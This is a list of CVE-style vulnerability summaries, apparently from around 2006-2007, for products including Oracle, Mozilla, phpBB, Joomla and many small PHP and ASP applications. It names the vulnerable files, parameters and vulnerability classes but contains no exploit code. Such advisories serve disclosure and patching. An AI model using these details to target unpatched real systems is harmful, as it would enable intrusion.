BEA WebLogic Portal 9.2 does not properly handle when an administrator deletes entitlements for a role, which causes other role entitlements to be "inadvertently affected," which has an unknown impact.
Unspecified vulnerability in the rating section in PostNuke 0.764 has unknown impact and attack vectors, related to "an interesting bug."
** DISPUTED **
Rumpus 5.1 and earlier has weak permissions for certain files and directories under /usr/local/Rumpus, including the configuration file, which allows local users to have an unknown impact by creating, modifying, or deleting files.
Unspecified vulnerability in the FTP server implementation in HP Jetdirect firmware x.20.nn through x.24.nn allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in the SIP module in InGate Firewall and SIParator before 4.5.1 allows remote attackers to conduct replay attacks on the authentication mechanism via unknown vectors.
Multiple unspecified vulnerabilities in Zina 1.0rc1 and earlier have unknown impact and attack vectors related to "Potential security bugs."
Unspecified vulnerability in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.47.11 and 8.48.06 has unknown impact and attack vectors in PeopleTools, aka PSE03.
Unspecified vulnerability in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.22.13, 8.47.11, and 8.48.06 has unknown impact and attack vectors in PeopleTools, aka PSE02.
Unspecified vulnerability in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.22.13 and 8.47.11 has unknown impact and attack vectors in PeopleTools, aka PSE01.
Unspecified vulnerability in Oracle Enterprise Manager 10.2.0.1 has unknown impact and attack vectors related to Database Cloning &amp; Data Guard Management, aka EM06.
Multiple unspecified vulnerabilities in Oracle Enterprise Manager 10.1.0.5 and 10.2.0.1 have unknown impact and attack vectors related to (1) Oracle Agent (EM03) and (2) EM04 and (3) EM05 in Enterprise Manager Console.  NOTE: EM05 might be related to CVE-2007-0222.
Multiple unspecified vulnerabilities in Oracle Enterprise Manager 10.1.0.5 have unknown impact and attack vectors related to Oracle Agent, aka (1) EM01 and (2) EM02.  NOTE: EM05 might be related to CVE-2007-0222.
Unspecified vulnerability in Oracle E-Business Suite and Applications 6.2.3 has unknown impact and attack vectors related to Oracle Exchange, aka APPS02.
Multiple unspecified vulnerabilities in Oracle E-Business Suite and Applications 11.5.10CU2 have unknown impact and attack vectors related to (1) Application Object Library (APPS01), (2) Human Resources (APPS03), (3) Payables (APPS04), (4) Trading Community Architecture (APPS05), and (5) Web Applications Desktop Integrator (APPS06).
Multiple unspecified vulnerabilities in Oracle Collaboration Suite 9.0.4.2 have unknown impact and attack vectors related to Oracle Containers for J2EE, aka (1) OC4J01, (2) OC4J05, and (3) OC4J06.
Unspecified vulnerability in Oracle Application Server 10.1.4.0 has unknown impact and attack vectors related to Oracle Internet Directory, aka OID01.
Unspecified vulnerability in Oracle Application Server 9.0.4.3, 10.1.2.0.0, and 10.1.2.0.2; and Collaboration Suite 9.0.4.2 and 10.1.2; has unknown impact and attack vectors related to Containers for J2EE, aka OC4J08.
Unspecified vulnerability in Oracle Application Server 10.1.2.0.2 and 10.1.3.0, and Collaboration Suite 10.1.2, has unknown impact and attack vectors related to Containers for J2EE, aka OC4J07.
Unspecified vulnerability in Oracle Application Server 9.0.4.3, 10.1.2.0.2, and 10.1.2.2; Collaboration Suite 9.0.4.2 and 10.1.2; and E-Business Suite and Applications 11.5.10CU2 has unknown impact and attack vectors related to Oracle Reports Developer, aka REP01.
Multiple unspecified vulnerabilities in Oracle Application Server 9.0.4.3 and 10.1.2.0.0, and Collaboration Suite 9.0.4.2, have unknown impact and attack vectors related to Oracle Containers for J2EE, aka (1) OC4J03 and (2) OC4J04.
Unspecified vulnerability in Oracle Application Server 9.0.4.3 and Collaboration Suite 9.0.4.2 has unknown impact and attack vectors related to Oracle Containers for J2EE, aka OC4J02.
Unspecified vulnerability in Oracle HTTP Server 9.0.1.5, Application Server 9.0.4.2 and 10.1.2.0.0, and Collaboration Suite 9.0.4.2 has unknown impact and attack vectors related to the Oracle Process Mgmt &amp; Notification component, aka OPMN02.
Multiple unspecified vulnerabilities in Oracle HTTP Server 9.0.1.5, 9.2.0.8, 10.1.0.5, and 10.2.0.3; Application Server 9.0.4.3, 10.1.2.0.0, 10.1.2.0.1, 10.1.2.0.2, 10.1.2.1, and 10.1.3.0; and Collaboration Suite 9.0.4.2 and 10.1.2; have unknown impact and attack vectors related to the Oracle HTTP Server, aka (1) OHS03 and (2) OHS04.
Unspecified vulnerability in Oracle HTTP Server 9.0.1.5, Application Server 9.0.4.3, 10.1.2.0.0, 10.1.2.0.2, and 10.1.2.2; and Collaboration Suite 9.0.4.2 and 10.1.2; has unknown impact and attack vectors related to the Oracle Process Mgmt &amp; Notification component, aka OPMN01.   NOTE: as of 20070123, Oracle has not disputed claims by a reliable researcher that OPMN01 is for a buffer overflow in Oracle Notification Service (ONS).
Multiple unspecified vulnerabilities in Oracle HTTP Server 9.2.0.8 and Oracle E-Business Suite and Applications 11.5.10CU2 have unknown impact and attack vectors, aka (1) OHS01, (2) OHS02, (3) OHS05, (4) OHS06, and (5) OHS07.
Multiple unspecified vulnerabilities in Oracle Database 8.1.7.4, 9.0.1.5, 9.2.0.7, and 10.1.0.5 have unknown impact and attack vectors related to (1) NLS Runtime and lmsgen (DB12), and (2) Oracle Text and ctxkbtc (DB14).
Unspecified vulnerability in Oracle Database client-only 10.1.0.4 has unknown impact and attack vectors related to the Export component and expdp or impdp, aka DB11.
Multiple unspecified vulnerabilities in Oracle Database 8.1.7.4 and 9.0.1.5 have unknown impact and attack vectors related to (1) Advanced Security Option and oklist or okdstry (DB10), (2) Oracle Net Services (DB13), and (3) Recovery Manager and oklist (DB16).
Multiple unspecified vulnerabilities in Oracle Database 9.2.0.7 and 10.1.0.5 have unknown impact and attack vectors related to (1) Export and sys.dbms_logrep_util (DB08), and (2) Oracle Streams and sys.dbms_capture_adm_internal privileges (DB09).  NOTE: Oracle has not disputed reliable researcher claims that DB08 is for a buffer overflow in the GET_OBJECT_NAME procedure in the DBMS_LOGREP_UTIL package, and DB09 is for buffer overflows in the CREATE_CAPTURE, ALTER_CAPTURE, and ABORT_TABLE_INSTANTIATION procedures in SYS.DBMS_CAPTURE_ADM_INTERNAL.
Unspecified vulnerability in Oracle Database 9.0.1.5, 9.2.0.8, 10.1.0.5, and 10.2.0.3 has unknown impact and attack vectors related to XMLDB, aka DB06.  NOTE: as of 20070123, Oracle has not disputed claims by a reliable researcher that DB06 is for multiple cross-site scripting (XSS) vulnerabilities.
Unspecified vulnerability in Oracle Database 9.0.1.5 and 9.2.0.7 has unknown impact and attack vectors related to the Log Miner component and sys.dbms_log_mnr privileges, aka DB04.  NOTE: Oracle has not disputed a reliable researcher claim that this is a buffer overflow in the ADD_LOGFILE procedure for the SYS.DBMS_LOGMNR package that allows code execution.
Unspecified vulnerability in Oracle Database 9.2.0.8, 10.1.0.5, and 10.2.0.3 has unknown impact and attack vectors related to the Change Data Capture and sys.dbms_cdc_subscribe privileges, aka DB02.
Multiple unspecified vulnerabilities in Oracle Database 9.0.1.5, 9.2.0.7, and 10.1.0.5 have unknown impact and attack vectors related to (1) the Advanced Queuing component and sys.dbms_aqsys.dbms_aq privileges (DB01), (2) Advanced Replication and sys.dbms_repcat_untrusted (DB07), and (3) Oracle Text and ctxload (DB15).  NOTE: Oracle has not publicly claims by reliable researchers that DB01 is for SQL injection in the SYS.DBMS_AQ_INV package, and DB07 is for a buffer overflow in the UNREGISTER_SNAPSHOT procedure in the DBMS_REPCAT_UNTRUSTED package.
Buffer overflow in Winzip32.exe in WinZip 9.0 allows local users to cause a denial of service (application crash) and possibly execute arbitrary code via a long command line argument.  NOTE: this issue may cross privilege boundaries if an application automatically invokes Winzip32.exe for untrusted input filenames, as in the case of a file upload application.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Total Commander before 6.5.6 allows user-assisted remote attackers to delete arbitrary files and corrupt a filesystem via a crafted RAR file.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Format string vulnerability in the errors_create_window function in errors.c in xine-ui allows attackers to execute arbitrary code via unknown vectors.
Directory traversal vulnerability in the EmChartBean server side component for Oracle Application Server 10g allows remote attackers to read arbitrary files via unknown vectors, probably "\.." sequences in the beanId parameter.  NOTE: this is likely a duplicate of another CVE that Oracle addressed in CPU Jan 2007, but due to lack of details by Oracle, it is unclear which BugID this issue is associated with, so the other CVE cannot be determined.  Possibilities include EM02 (CVE-2007-0292) or EM05 (CVE-2007-0293).
Unspecified vulnerability in HP OpenView Network Node Manager (OV NNM) 6.20, 6.4x, 7.01, and 7.50 allows remote attackers to read arbitrary files via unknown vectors.
Multiple unspecified vulnerabilities in phpMyAdmin before 2.9.2-rc1 have unknown impact and attack vectors.
Getahead Direct Web Remoting (DWR) before 1.1.4 allows attackers to cause a denial of service (memory exhaustion and servlet outage) via unknown vectors related to a large number of calls in a batch.
Cross-site scripting (XSS) vulnerability in /search in iPlanet Web Server 4.x allows remote attackers to inject arbitrary web script or HTML via the NS-max-records parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
formbankcgi.exe in Fersch Formbankserver 1.9, when the PATH_INFO begins with (1) AbfrageForm or (2) EingabeForm, allows remote attackers to cause a denial of service (daemon crash) via multiple requests containing many /../ sequences in the Name parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
The Adobe PDF specification 1.3, as implemented by (a) xpdf 3.0.1 patch 2, (b) kpdf in KDE before 3.5.5, (c) poppler before 0.5.4, and other products, allows remote attackers to have an unknown impact, possibly including denial of service (infinite loop), arbitrary code execution, or memory corruption, via a PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages attribute that references an invalid page tree node.
The Adobe PDF specification 1.3, as implemented by Adobe Acrobat before 8.0.0, allows remote attackers to have an unknown impact, possibly including denial of service (infinite loop), arbitrary code execution, or memory corruption, via a PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages attribute that references an invalid page tree node.
The Adobe PDF specification 1.3, as implemented by Apple Mac OS X Preview, allows remote attackers to have an unknown impact, possibly including denial of service (infinite loop), arbitrary code execution, or memory corruption, via a PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages attribute that references an invalid page tree node.
Heap-based buffer overflow in an unspecified procedure in Trend Micro ServerProtect 5.7 and 5.58 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to a folder read operation over RPC.
Heap-based buffer overflow in an unspecified procedure in Trend Micro ServerProtect 5.7 and 5.58 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to a file read operation over RPC.
Heap-based buffer overflow in an unspecified procedure in Trend Micro ServerProtect 5.7 and 5.58 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to a read operation over RPC.
Directory traversal vulnerability in formbankcgi.exe/AbfrageForm in Formbankserver 1.9 allows remote attackers to read arbitrary files via directory traversal sequences in the Name parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in mod/nc_phpmyadmin/core/libraries/Theme_Manager.class.php in Ixprim 2.0 allows remote attackers to execute arbitrary PHP code via a URL in an unspecified parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Teamtek Universal FTP Server 1.0.50 allows remote attackers to cause a denial of service (daemon crash or hang) via (1) multiple STOR (aka PUT) commands, or an MKD command followed by (2) a '*' argument, (3) a '|' argument, (4) spaces, or (5) a long string.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in display.asp in Civica Software Civica allows remote attackers to execute arbitrary SQL commands via the Entry parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in SAP SAPLPD and SAPSPRINT allows remote attackers to cause a denial of service (application crash) via a certain print job request.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The Intel Core 2 Extreme processor X6800 and Core 2 Duo desktop processor E6000 and E4000 incorrectly set the memory page Access (A) bit for a page in certain circumstances involving proximity of the code segment limit to the end of a code page, which has unknown impact and attack vectors on certain operating systems other than OpenBSD, aka AI90.
Multiple buffer overflows in Firebird 1.5, one of which affects WNET, have unknown impact and attack vectors.  NOTE: this issue might overlap CVE-2006-1240.
Buffer overflow in ageet AGEphone before 1.4.0 might allow remote attackers to have an unknown impact via unspecified vectors.
Unspecified vulnerability in IBM WebSphere Application Server (WAS) before 5.1.1.14, and WAS for z/OS 601 before 6.0.2.13, has unknown impact and attack vectors, related to a "Potential security exposure," aka PK26123.
Multiple PHP remote file inclusion vulnerabilities in Exhibit Engine (EE) 1.22, and possibly earlier, allow remote attackers to execute arbitrary PHP code via a URL in the toroot parameter to (1) fetchsettings.php or (2) fstyles.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in ProRat Server 1.9 Fix2 allows remote attackers to bypass the authentication mechanism for remote login via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
DreameeSoft Password Master 1.0 stores the database in an unencrypted format when the master password is set, which allows attackers with physical access to read the database contents via an unspecified authentication bypass.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in lib/functions.inc.php in PHP Poll Creator (phpPC) 1.04 allows remote attackers to execute arbitrary PHP code via a URL in the relativer_pfad parameter, a different vector and version than CVE-2005-1755.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unrestricted file upload vulnerability in main_user.php in Upload Tool for PHP 1.0 allows remote attackers to upload and execute arbitrary files with executable extensions such as .php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unrestricted file upload vulnerability in P-News 2.0 allows remote attackers to upload and execute arbitrary files via an avatar file. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in index.php in SolarPay allows remote attackers to read certain files via a .. (dot dot) in the read parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in TaskFreak! before 0.1.4 have unknown impact and attack vectors.
PHP remote file inclusion vulnerability in config.php in phpht Topsites FREE 1.022b allows remote attackers to execute arbitrary PHP code via a URL in the fullpath parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Opentools Attachment Mod before 2.4.5 allows remote attackers to inject arbitrary web script or HTML in Internet Explorer via unknown vectors related to the uploaded attachments form.  NOTE: some details were obtained from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Sphider before 1.3.1c allow remote attackers to inject arbitrary web script or HTML via the catid parameter to (1) templates/standard/search_form.html and (2) templates/dark/search_form.html.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in search.php in Sphider before 1.3.1c allows remote attackers to execute arbitrary SQL commands via the category parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. NOTE: this issue might be primary to CVE-2006-2506.2.
PHP remote file inclusion vulnerability in cmpro.intern/login.inc.php for Clan Manager Pro (CMPRO) 1.1.0 allows remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in Clan Manager Pro (CMPRO) 1.1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the (1) rootpath and possibly (2) sitepath parameters to (a) cmpro.ext/comment.core.inc.php and (b) cmpro.intern/comment.core.inc.php.  NOTE: the provenance of this information is unknown; details are obtained from third party sources.
Single CPU Sun systems running Solaris 7, 8, or 9, such as Netra, allows remote attackers to cause a denial of service (console hang) via a flood of small TCP/IP packets.  NOTE: this issue has not been replicated by third parties. In addition, the cause is unknown, although it might be related to "jabber" and generation of a large amount of interrupts within the console, or a hardware error.
phpwcms 1.2.5-DEV and earlier, and 1.1 before RC4, allows remote attackers to execute arbitrary code via crafted arguments to the (1) text_evento and (2) email_eventonome_evento parameters to phpwcms_code_snippets/mail_file_form.php and sample_ext_php/mail_file_form.php, which is processed by the render_PHPcode function.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Joomla! before 1.0.10 allows remote attackers to spoof the frontend submission forms, which has unknown impact and attack vectors.
Unspecified vulnerability in Joomla! before 1.0.10 has unknown impact and attack vectors, related to "securing mosmsg from misuse." NOTE: it is possible that this issue overlaps CVE-2006-1029.
SQL injection vulnerability in item.php in PSY Auction allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in email_request.php in PSY Auction allows remote attackers to inject arbitrary web script or HTML via the user_id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in add_comment.php in Wheatblog (wB) 1.1 allows remote attackers to inject arbitrary web script or HTML via the Email field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: this issue may overlap CVE-2006-5195.
Directory traversal vulnerability in avatar.php in PhpMyChat Plus 1.9 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the L parameter, a different issue than CVE-2006-5897. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in a cryptographic feature in MailEnable Standard Edition before 1.93, Professional Edition before 1.73, and Enterprise Edition before 1.21 leads to "weakened authentication security" with unknown impact and attack vectors.  NOTE: due to lack of details, it is not clear whether this is the same as CVE-2006-1792.
Multiple cross-site scripting (XSS) vulnerabilities in warforge.NEWS 1.0 allow remote attackers to inject arbitrary HTML and web script via the (1) title and (2) newspost parameters to (a) newsadd.php, and the (3) name, title, and (4) comment parameters to (b) news.php, a different set of vectors than CVE-2006-1818.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in pages/addcomment2.php in Neuron Blog 1.1 allow remote attackers to inject arbitrary SQL commands via the (1) commentname, (2) commentmail, (3) commentwebsite, and (4) comment parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Easy Chat Server 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download certain files via direct requests to files such as (1) ServerKey.pem and (2) AcceptIP.txt.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in eXtremail 2.1 has unknown impact and attack vectors, as demonstrated by VulnDisco Pack.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Nucleus before 3.24 allows remote attackers to inject arbitrary web script or HTML via unknown vectors, possibly involving (1) lib/ADMIN.php and (2) lib/SKIN.php.
Unspecified vulnerability in the Admin login for Georgian discussion board (GeoBB) before 1.0 has unknown impact and attack vectors.
Getahead Direct Web Remoting (DWR) before 1.1.3 allows attackers to cause a denial of service (infinite loop) via unknown vectors related to "crafted input."
Unspecified vulnerability in the Bluesoil Bluetooth stack has unknown impact and attack vectors.
Unspecified vulnerability in the Bluetooth stack on Mac OS 10.4.7 and earlier has unknown impact and local attack vectors, related to "Mach Exception Handling", a different issue than CVE-2006-6900.
Unspecified vulnerability in the Bluetooth stack in Apple Mac OS 10.4 has unknown impact and attack vectors, related to an "implementation bug."
Multiple unspecified vulnerabilities in SPINE before 1.2 have unknown impact and attack vectors, related to (1) "Placeholders in database handler" and (2) "Macro admin security."
Unrestricted file upload vulnerability in logahead UNU 1.0 allows remote attackers to upload and execute arbitrary PHP code via unspecified vectors related to plugins/widged/_widged.php (aka the WidgEd plugin), a different vulnerability than CVE-2006-6783.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in friend.php in eNdonesia 8.4 allow remote attackers to inject arbitrary web script or HTML via the (1) Message or (2) Your Name field.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in the BE IT EasyPartner 0.0.9 beta component for Joomla! allows remote attackers to execute arbitrary PHP code via unspecified vectors.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Certain forms in phpBB before 2.0.22 lack session checks, which has unknown impact and remote attack vectors.
Unspecified vulnerability in phpBB before 2.0.22 has unknown impact and remote attack vectors related to a "negative start parameter."
Unspecified vulnerability in phpBB before 2.0.22 has unknown impact and remote attack vectors related to "criteria for 'bad' redirection targets."
Multiple unspecified vulnerabilities in Joomla! before 1.0.12 have unknown impact and attack vectors related to (1) "unneeded legacy functions" and (2) "Several low level security fixes."
com_categories in Joomla! before 1.0.12 does not validate input, which has unknown impact and remote attack vectors.
Efkan Forum 1.0 and earlier store sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for forum.mdb.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in Efkan Forum 1.0 and earlier allow remote attackers to execute arbitrary SQL commands via (1) the grup parameter in admin.asp, or the id parameter in (2) default.asp or (3) admin.asp.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information. The default.asp/grup vector is already covered by CVE-2006-6794.
Unspecified vulnerability in the tab editor for Personal .NET Portal before 2.0.0 has unknown impact and attack vectors related to a "Security leak."
Calendar MX BASIC 1.0.2 and earlier store sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for calendar.mdb.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in calendar_detail.asp in Calendar MX BASIC 1.0.2 and earlier allows remote attackers to execute arbitrary SQL commands via the ID parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in cwmExplorer 1.1.0 and earlier allow remote attackers to execute arbitrary SQL commands via unspecified vectors.  NOTE: The provenance of this information is unknown; details are obtained solely from third party information.
Buffer overflow in FTPRush 1.0.0.610 might allow attackers to gain privileges via a long Host field.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information. Also, it is not clear whether this issue crosses security boundaries.
Buffer overflow in the parse_expression function in parse_config in OpenSER 1.1.0 allows attackers to have an unknown impact via a long str parameter.
PHP remote file inclusion vulnerability in i-accueil.php in Newxooper 0.9 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the chemin parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
phpProfiles before 2.1.1 does not have an index.php or other index file in the (1) image_data, (2) graphics/comm, or (3) users read/write directories, which might allow remote attackers to list directory contents or have other unknown impacts.
Multiple PHP remote file inclusion vulnerabilities in phpProfiles 3.1.2b and earlier allow remote attackers to execute arbitrary PHP code via a URL in the menu parameter to (1) include/body.inc.php or (2) include/body_admin.inc.php; or a URL in the incpath parameter to (3) index.inc.php, (4) account.inc.php, (5) admin_newcomm.inc.php, (6) header_admin.inc.php, (7) header.inc.php, (8) friends.inc.php, (9) menu_u.inc.php, (10) notify.inc.php, (11) body.inc.php, (12) body_admin.inc.php, (13) commrecc.inc.php, (14) do_reg.inc.php, (15) comm_post.inc.php, or (16) menu_v.inc.php in include/, different vectors than CVE-2006-5634.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple directory traversal vulnerabilities in PHPBuilder 0.0.2 and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter to (1) lib/htm2php.php and (2) sitetools/htm2php.php.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Stack-based buffer overflow in the NeoTraceExplorer.NeoTraceLoader ActiveX control (NeoTraceExplorer.dll) in NeoTrace Express 3.25 and NeoTrace Pro (aka McAfee Visual Trace) 3.25 allows remote attackers to execute arbitrary code via a long argument string to the TraceTarget method.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in the template files in Soumu Workflow for Groupmax 01-00 through 01-01, Soumu Workflow 02-00 through 03-03, and Koukyoumuke Soumu Workflow 01-00 through 01-01 allow remote attackers to bypass authentication mechanisms on web pages via unknown vectors.
Cross-site scripting (XSS) vulnerability in Global.pm in @Mail before 4.61 allows remote attackers to inject arbitrary web script or HTML via crafted e-mail messages.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in index.php in Carsen Klock TextSend 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) error or (2) success parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in Paristemi 0.8.3 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the SERVER_DIRECTORY parameter to unspecified scripts, a different vector than CVE-2006-6739.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Web Automated Perl Portal (WebAPP) 0.9.9.4, and 0.9.9.3.4 Network Edition (NE) (aka WebAPP.NET) allows remote attackers to bypass filtering mechanisms via unknown vectors.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Web Automated Perl Portal (WebAPP) 0.9.9.4, and 0.9.9.3.4 Network Edition (NE) (aka WebAPP.NET), allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Heap-based buffer overflow in Pedro Lineu Orso chetcpasswd 2.3.3 allows local users to cause a denial of service (application crash) and possibly execute arbitrary code via a long REMOTE_ADDR environment variable.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Heap-based buffer overflow in Pedro Lineu Orso chetcpasswd before 2.4 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long X-Forwarded-For HTTP header.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in Burak Yylmaz Download Portal allow remote attackers to execute arbitrary SQL commands via the (1) kid or possibly (2) id parameter to (a) HABERLER.ASP and (b) ASPKAT.ASP.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Nortel CallPilot 4.x Server has unknown impact and attack vectors, aka P-2006-0011-GLOBAL.
Cross-site scripting (XSS) vulnerability in VerliAdmin 0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in VerliAdmin 0.3 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) nick_mod or (2) nick parameter to (a) repass.php or (b) verify.php. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Utility Classes for IBM WebSphere Application Server (WAS) before 5.1.1.13 and 6.x before 6.0.2.17 has unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in an unspecified component of Moodle 1.5 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: It is unclear whether this candidate overlaps CVE-2006-4784 or CVE-2006-4941.
Cross-site scripting (XSS) vulnerability in mod/forum/discuss.php in Moodle 1.6.1 allows remote attackers to inject arbitrary web script or HTML via the navtail parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
clientcommands in Nexuiz before 2.2.1 has unknown impact and remote attack vectors related to "remote console command injection."
The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
admin/change.php in ProNews 1.5 does not check whether a user is permitted to change news items, which allows remote attackers to add or delete information within an item, and possibly have other impacts. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Skulls! before 0.2.6 have unknown impact and attack vectors, as addressed by "Many security fixes."
Cross-site scripting (XSS) vulnerability in CM68 News allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in hata.asp in Cilem Haber Free Edition allows remote attackers to inject arbitrary web script or HTML via the hata parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Vt-Forum Lite 1.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) StrMsg or (2) Topic_ID parameter to (a) vf_info.asp, (b) vf_newtopic.asp, (c) vf_settings.asp, and (d) vf_replytopic.asp, different vectors than CVE-2006-6447.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in guest.php in Gizzar 03162002 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the basePath parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in vdateUsr.asp in EzHRS HR Assist 1.05 and earlier allows remote attackers to execute arbitrary SQL commands via the password parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Mantis before 1.1.0a2 sets the default value of $g_bug_reminder_threshold to "reporter" instead of a more privileged role, which has unknown impact and attack vectors, possibly related to frequency of reminders.
Cross-site request forgery (CSRF) vulnerability in phpBB 2.0.21 allows remote authenticated users to send unauthorized messages as an arbitrary user via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Use-after-free vulnerability in the LiveConnect bridge code for Mozilla Firefox 2.x before 2.0.0.1, 1.5.x before 1.5.0.9, Thunderbird before 1.5.0.9, and SeaMonkey before 1.0.7 allows remote attackers to cause a denial of service (crash) via unknown vectors.
Multiple unspecified vulnerabilities in the JavaScript engine for Mozilla Firefox 2.x before 2.0.0.1, 1.5.x before 1.5.0.9, Thunderbird before 1.5.0.9, SeaMonkey before 1.0.7, and Mozilla 1.7 and probably earlier on Solaris, allow remote attackers to cause a denial of service (memory corruption and crash) and possibly execute arbitrary code via unknown impact and attack vectors.
Multiple unspecified vulnerabilities in the layout engine for Mozilla Firefox 2.x before 2.0.0.1, 1.5.x before 1.5.0.9, Thunderbird before 1.5.0.9, and SeaMonkey before 1.0.7 allow remote attackers to cause a denial of service (memory corruption and crash) and possibly execute arbitrary code via unknown attack vectors.
